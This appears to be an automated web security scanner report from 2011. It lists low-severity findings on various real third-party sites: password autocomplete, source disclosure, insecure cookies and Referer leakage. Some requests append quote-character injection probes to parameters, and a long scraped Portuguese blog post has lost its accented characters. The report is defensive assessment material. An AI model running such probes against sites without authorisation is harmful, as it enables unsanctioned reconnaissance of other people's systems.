<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start login --> <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input class="" id="passwordinput" name="password" type="password"> <div id="cnnConnectLoginErrors" style="display: none;"> ...[SNIP]...
The form contains the following password field with autocomplete enabled:
password
Request
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start registration --> <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input id="signup_password" name="password" maxlength="10" type="password" /> <span class="fieldTip"> ...[SNIP]...
The form contains the following password field with autocomplete enabled:
newPassword
Request
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start reset password --> <form id="cnnConnectFormReset" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input type="password" id="new_password" name="newPassword"> <div id="cnnConnectResetErrors"> ...[SNIP]...
The page contains a form with the following action URL:
http://www.local.com/results.aspx
The form contains the following password field with autocomplete enabled:
password
Request
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.political.cov.com/login.cfm
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password field with autocomplete enabled:
aPassword
Request
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <td align="left" valign="top"> <form method="post" action="alumni_authenticate.cfm" id="loginFrm">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... </div>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... </div>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]... </div>
The page contains a form with the following action URL:
http://www.vault.com/wps/portal/usa/membership
The form contains the following password fields with autocomplete enabled:
UserPassword
UserConfirm
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The form contains the following password field with autocomplete enabled:
password
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The form contains the following password fields with autocomplete enabled:
password
UserConfirm
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1®ionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The form contains the following password fields with autocomplete enabled:
password
UserConfirm
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
The form contains the following password field with autocomplete enabled:
password
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... </div>
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
The application appears to disclose some server-side source code written in PHP.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <meta name="copyright" content="<?php echo AT_COPYRIGHT_TEXT ?>" /> ...[SNIP]...
The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:
EMAIL_REQUIRED
EMAIL_DATATYPE
EMAIL
submit
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Content-Length: 80578 Content-Type: text/html; charset=utf-8 X-Powered-By: eZ Publish Content-Language: en-US Served-by: Pragma: Cache-Control: max-age=2959 Expires: Wed, 19 Jan 2011 16:37:01 GMT Date: Wed, 19 Jan 2011 15:47:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]...
15. Cross-domain Referer leakagepreviousnext There are 42 instances of this issue:
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The response contains the following links to other domains:
http://www.e-classifieds.net/
http://www.hagenhosting.com/
http://www.hagensoftware.com/
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=personals HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:25 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 52149
The response contains the following links to other domains:
http://www.e-classifieds.net/
http://www.hagenhosting.com/
http://www.hagensoftware.com/
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=&display_past_polls=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:28 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 47923
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:07 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207116
GET /?utm_source=horaextra.org&utm_medium=affiliate&utm_content=textlink&utm_campaign=horaextra HTTP/1.1 Host: gc.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:14 GMT Server: Apache/2.2.10 (CentOS) X-Pingback: http://gc.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 105465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <p>O <a href="http://duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/?referer=');">Anderson Casimiro</a> (<a href="http://twitter.com/duodraco" onclick="urchinTracker('/outgoing/twitter.com/duodraco?referer=');">@duodraco</a>) come..ou um <a href="http://en.wikipedia.org/wiki/Internet_meme" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Internet_meme?referer=');">meme</a> ...[SNIP]... /strong>. Nele voc.. escreve sobre quaisquer 7 coisas do seu ambiente de trabalho que achar mais interessantes e em seguida indica de 3 a 5 pesoas para fazerem o mesmo. O Anderson passou o meme para o <a href="http://ianntech.com.br/2010/12/18/meu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/ianntech.com.br/2010/12/18/meu-ambiente-de-trabalho-em-7-itens/?referer=');">Ivo Nascimento</a> (<a href="http://twitter.com/ivonascimento" onclick="urchinTracker('/outgoing/twitter.com/ivonascimento?referer=');">@ivonascimento</a>), que depois mandou para o <a href="http://www.brgomes.com/blog/meu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/www.brgomes.com/blog/meu-ambiente-de-trabalho-em-7-itens/?referer=');">Bruno Roberto Gomes</a> (<a href="http://twitter.com/brgomes" onclick="urchinTracker('/outgoing/twitter.com/brgomes?referer=');">@brgomes</a>) e por fim para o <a href="http://www.hlegius.pro.br/meu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/www.hlegius.pro.br/meu-ambiente-de-trabalho-em-7-itens/?referer=');">H..lio Costa</a> (<a href="http://twitter.com/hlegius" onclick="urchinTracker('/outgoing/twitter.com/hlegius?referer=');">@hlegius</a> ...[SNIP]... <p>O <a href="http://git-scm.com" onclick="urchinTracker('/outgoing/git-scm.com?referer=');">Git</a> ...[SNIP]... <p>O <a href="https://github.com/guilhermechapiewski/" onclick="urchinTracker('/outgoing/github.com/guilhermechapiewski/?referer=');">Github</a> faz o Git – que ja .. fant..stico – ficar ainda melhor. O Github mudou para melhor a forma de colabora....o entre desenvolvedores em projetos <a href="http://en.wikipedia.org/wiki/Open_source" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Open_source?referer=');">open source</a>. Basta voc.. criar um clone remoto do projeto que deseja contribuir, fazer suas altera....es e fazer um <a href="http://help.github.com/pull-requests/" onclick="urchinTracker('/outgoing/help.github.com/pull-requests/?referer=');">“pull request”</a>. Voc.. pode adicionar colaboradores nos seus reposit..rios ou at.. mesmo criar <a href="https://github.com/horaextra" onclick="urchinTracker('/outgoing/github.com/horaextra?referer=');">um time de colaboradores</a>. Isso .. mais ou menos o que as pessoas j.. faziam antes, <a href="http://www.eqqon.com/index.php/Collaborative_Github_Workflow" onclick="urchinTracker('/outgoing/www.eqqon.com/index.php/Collaborative_Github_Workflow?referer=');">o Github apenas entendeu esse processo e criou uma ferramenta excelente para suport..-lo com algumas melhorias</a>. E isso tudo n..o serve apenas para projetos abertos n..o, voc.. pode fazer como eu (e muita gente) e por <a href="https://github.com/plans" onclick="urchinTracker('/outgoing/github.com/plans?referer=');">alguns m..seros d..lares</a> ...[SNIP]... <p>O <a href="http://code.google.com/appengine/" onclick="urchinTracker('/outgoing/code.google.com/appengine/?referer=');">Google App Engine</a> tamb..m .. um absurdo. Com ele voc.. pode desenvolver aplica....es <a href="http://code.google.com/appengine/docs/python/overview.html" onclick="urchinTracker('/outgoing/code.google.com/appengine/docs/python/overview.html?referer=');">Python</a> ou <a href="http://code.google.com/appengine/docs/java/overview.html" onclick="urchinTracker('/outgoing/code.google.com/appengine/docs/java/overview.html?referer=');">Java</a> num estalar de dedos e coloc..-las para funcionar numa infraestrutura bastante confi..vel e r..pida. O App Engine oferece banco de dados, cache, storage e <a href="http://code.google.com/appengine/docs/whatisgoogleappengine.html" onclick="urchinTracker('/outgoing/code.google.com/appengine/docs/whatisgoogleappengine.html?referer=');">v..rias coisas ..teis</a> que te ajudam a focar na sua aplica....o e esquecer a infraestrutura. Para os <a href="http://rubyonrails.org" onclick="urchinTracker('/outgoing/rubyonrails.org?referer=');">Railers</a> que l..em este blog, o <a href="http://heroku.com" onclick="urchinTracker('/outgoing/heroku.com?referer=');">Heroku</a> ...[SNIP]... <p>O <a href="http://www.vmware.com/products/fusion/" onclick="urchinTracker('/outgoing/www.vmware.com/products/fusion/?referer=');">VMWare Fusion</a> ...[SNIP]... ter v..rios sistemas operacionais com diferentes browsers para testar minhas aplica....es web em uma m..quina s... Al..m disso, como trabalho muitas vezes desenvolvendo coisas que ser..o servidas com <a href="http://www.redhat.com/rhel/" onclick="urchinTracker('/outgoing/www.redhat.com/rhel/?referer=');">Red Hat Enterprise Linux</a> ou <a href="http://www.centos.org" onclick="urchinTracker('/outgoing/www.centos.org?referer=');">CentOS</a>, posso facilmente criar ambientes de desenvolvimento locais com esses sistemas operacionais e continuar trabalhando no conforto do meu <a href="http://www.apple.com/macosx/" onclick="urchinTracker('/outgoing/www.apple.com/macosx/?referer=');">Mac</a> ...[SNIP]... <p>Todo mundo tem seu editor preferido, e o meu .. o <a href="http://macromates.com" onclick="urchinTracker('/outgoing/macromates.com?referer=');">TextMate</a> ...[SNIP]... linguagem que j.. precisei at.. hoje, suportar sistemas de controle de vers..o, e por a.. vai. Infelizmente n..o consigo us..-lo para todas as linguagens que trabalho. Por exemplo, quando programo em <a href="http://java.sun.com" onclick="urchinTracker('/outgoing/java.sun.com?referer=');">Java</a> ainda prefiro usar o <a href="http://www.eclipse.org" onclick="urchinTracker('/outgoing/www.eclipse.org?referer=');">Eclipse</a>, ou o <a href="http://developer.apple.com/technologies/tools/xcode.html" onclick="urchinTracker('/outgoing/developer.apple.com/technologies/tools/xcode.html?referer=');">XCode</a> para brincar com <a href="http://developer.apple.com/technologies/ios/" onclick="urchinTracker('/outgoing/developer.apple.com/technologies/ios/?referer=');">iOS</a>, mas para todo o resto uso o TextMate (ou, quando em servidores remotos, o <a href="http://www.vim.org" onclick="urchinTracker('/outgoing/www.vim.org?referer=');">Vim</a> ...[SNIP]... <p>N..o tem como sobreviver sem um <a href="http://en.wikipedia.org/wiki/Unix_shell" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Unix_shell?referer=');">shell</a>. Eu costumo usar o Terminal do <a href="http://www.apple.com/macosx/" onclick="urchinTracker('/outgoing/www.apple.com/macosx/?referer=');">Mac OS X</a> com algumas customiza....es, e como shell uso o <a href="http://en.wikipedia.org/wiki/Bash_%28Unix_shell%29" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Bash_28Unix_shell_29?referer=');">Bash</a> ...[SNIP]... l para algumas tarefas de desenvolvimento como usar o Git (incluindo resolver conflitos, prefiro fazer manualmente), buscar arquivos, inspecionar minha m..quina e por a.. vai. Tamb..m costumo escrever <a href="http://en.wikipedia.org/wiki/Shell_script" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Shell_script?referer=');">shell scripts</a> para fazer algumas tarefas pessoais como codificar v..deos com <a href="http://ffmpeg.org" onclick="urchinTracker('/outgoing/ffmpeg.org?referer=');">ffmpeg</a> ...[SNIP]... <p>Os <a href="http://www.apple.com/mac/" onclick="urchinTracker('/outgoing/www.apple.com/mac/?referer=');">Macs</a> ...[SNIP]... nciona e deixa o caminho livre para que eu possa trabalhar. J.. se foi a ..poca em que eu tinha tempo para comprar pe..a por pe..a e montar meu pr..prio computador, ou ent..o ficar re-configurando meu <a href="http://en.wikipedia.org/wiki/Xorg.conf" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Xorg.conf?referer=');">xorg.conf</a> ...[SNIP]... display do MacBook (porque .. gigante). Se voc.. nunca tentou usar dois monitores, n..o perca mais tempo e tente agora, voc.. vai ver a diferen..a. Quanto ao mouse e teclado, durante muito tempo usei <a href="http://www.microsoft.com/hardware/mouseandkeyboard/default.mspx" onclick="urchinTracker('/outgoing/www.microsoft.com/hardware/mouseandkeyboard/default.mspx?referer=');">hardware Microsoft</a> (ali..s, isso eles fazem bem) mas recentemente tenho usado o <a href="http://www.apple.com/magicmouse/" onclick="urchinTracker('/outgoing/www.apple.com/magicmouse/?referer=');">Magic Mouse</a> e um <a href="http://store.apple.com/us/product/MC184LL/A" onclick="urchinTracker('/outgoing/store.apple.com/us/product/MC184LL/A?referer=');">mini teclado sem fio</a>, ambos da <a href="http://www.apple.com" onclick="urchinTracker('/outgoing/www.apple.com?referer=');">Apple</a> ...[SNIP]... <li><a href="http://akitaonrails.com" onclick="urchinTracker('/outgoing/akitaonrails.com?referer=');">Fabio Akita</a> (<a href="http://twitter.com/akitaonrails" onclick="urchinTracker('/outgoing/twitter.com/akitaonrails?referer=');">@akitaonrails</a> ...[SNIP]... <li><a href="http://fabiokung.com" onclick="urchinTracker('/outgoing/fabiokung.com?referer=');">Fabio Kung</a> (<a href="http://twitter.com/fabiokung" onclick="urchinTracker('/outgoing/twitter.com/fabiokung?referer=');">@fabiokung</a> ...[SNIP]... <li><a href="http://gabrielfalcao.com" onclick="urchinTracker('/outgoing/gabrielfalcao.com?referer=');">Gabriel Falc..o</a> (<a href="http://twitter.com/gabrielfalcao" onclick="urchinTracker('/outgoing/twitter.com/gabrielfalcao?referer=');">@gabrielfalcao</a> ...[SNIP]... <li><a href="http://henriquebastos.net" onclick="urchinTracker('/outgoing/henriquebastos.net?referer=');">Henrique Bastos</a> (<a href="http://twitter.com/henriquebastos" onclick="urchinTracker('/outgoing/twitter.com/henriquebastos?referer=');">@henriquebastos</a> ...[SNIP]... <li><a href="http://blog.aspercom.com.br" onclick="urchinTracker('/outgoing/blog.aspercom.com.br?referer=');">Rodrigo Yoshima</a> (<a href="http://twitter.com/rodrigoy" onclick="urchinTracker('/outgoing/twitter.com/rodrigoy?referer=');">@rodrigoy</a> ...[SNIP]... <p>Estamos contratando desenvolvedores para o <a href="http://www.yahoo.com.br" onclick="urchinTracker('/outgoing/www.yahoo.com.br?referer=');">Yahoo! Brasil</a> ...[SNIP]... <p>Nosso time .. respons..vel pelo desenvolvimento e manuten....o do <a href="http://meme.yahoo.com" onclick="urchinTracker('/outgoing/meme.yahoo.com?referer=');">Yahoo! Meme</a>. Para trabalhar conosco .. imprescind..vel ser faixa preta em <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a>, <a href="http://php.net" onclick="urchinTracker('/outgoing/php.net?referer=');">PHP</a> ou <a href="http://en.wikipedia.org/wiki/JavaScript" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/JavaScript?referer=');">JavaScript</a> ...[SNIP]... <p>T..o ou mais importante do que isso .. ter ..timos conhecimentos sobre <a href="http://en.wikipedia.org/wiki/Agile_software_development" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Agile_software_development?referer=');">desenvolvimento ..gil</a> (especialmente <a href="http://en.wikipedia.org/wiki/Extreme_Programming" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Extreme_Programming?referer=');">XP</a>), conhecer ferramentas de <a href="http://en.wikipedia.org/wiki/Unit_testing" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Unit_testing?referer=');">testes unit..rios</a>, ser capaz de trabalhar com <a href="http://en.wikipedia.org/wiki/Test-driven_development" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Test-driven_development?referer=');">TDD</a>, entender sobre <a href="http://en.wikipedia.org/wiki/Continuous_integration" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Continuous_integration?referer=');">CI</a> ...[SNIP]... </a> de rotinas/build/etc., melhores pr..ticas de desenvolvimento de software, <a href="http://en.wikipedia.org/wiki/Object-oriented_programming" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Object-oriented_programming?referer=');">Orienta....o .. Objetos</a>, <a href="http://en.wikipedia.org/wiki/Domain-driven_design" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Domain-driven_design?referer=');">Domain-Driven Design</a> e tudo mais que puder ser relevante para ajudar a construir software confi..vel e <a href="http://www.dicio.com.br/manutenivel/" onclick="urchinTracker('/outgoing/www.dicio.com.br/manutenivel/?referer=');">manuten..vel</a> de forma r..pida e com ritmo/qualidade sustent..vel. Experi..ncia com automatiza....o de testes com <a href="http://seleniumhq.org" onclick="urchinTracker('/outgoing/seleniumhq.org?referer=');">Selenium ou Webdriver</a> tamb..m .. essencial. Como trabalhamos com web, tamb..m .. necess..rio ter conhecimento em <a href="http://en.wikipedia.org/wiki/HTML" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/HTML?referer=');">HTML</a>, <a href="http://en.wikipedia.org/wiki/Cascading_Style_Sheets" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Cascading_Style_Sheets?referer=');">CSS</a> e desenvolvimento de aplica....es <a href="http://en.wikipedia.org/wiki/Cross-browser" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Cross-browser?referer=');">cross-browser</a> ...[SNIP]... produtos de escala mundial, .. necess..rio ter experi..ncia com aplica....es de alta performance e disponibilidade, identifica....o e otimiza....o de gargalos de performance, escalabilidade, caching e <a href="http://en.wikipedia.org/wiki/Shard_%28database_architecture%29" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Shard_28database_architecture_29?referer=');">sharding</a>. .. importante tamb..m ter bons conhecimentos de pelo menos um tipo de <a href="http://en.wikipedia.org/wiki/Unix" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Unix?referer=');">Unix</a> ...[SNIP]... <p>Conhecimentos em <a href="http://en.wikipedia.org/wiki/C_(programming_language)" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/C_programming_language?referer=');">C</a>, <a href="http://en.wikipedia.org/wiki/C%2B%2B" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/C_2B_2B?referer=');">C++</a>, <a href="http://en.wikipedia.org/wiki/Service-oriented_architecture" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Service-oriented_architecture?referer=');">arquitetura de servi..os</a>, desenvolvimento de <a href="http://en.wikipedia.org/wiki/Mashup_%28web_application_hybrid%29" 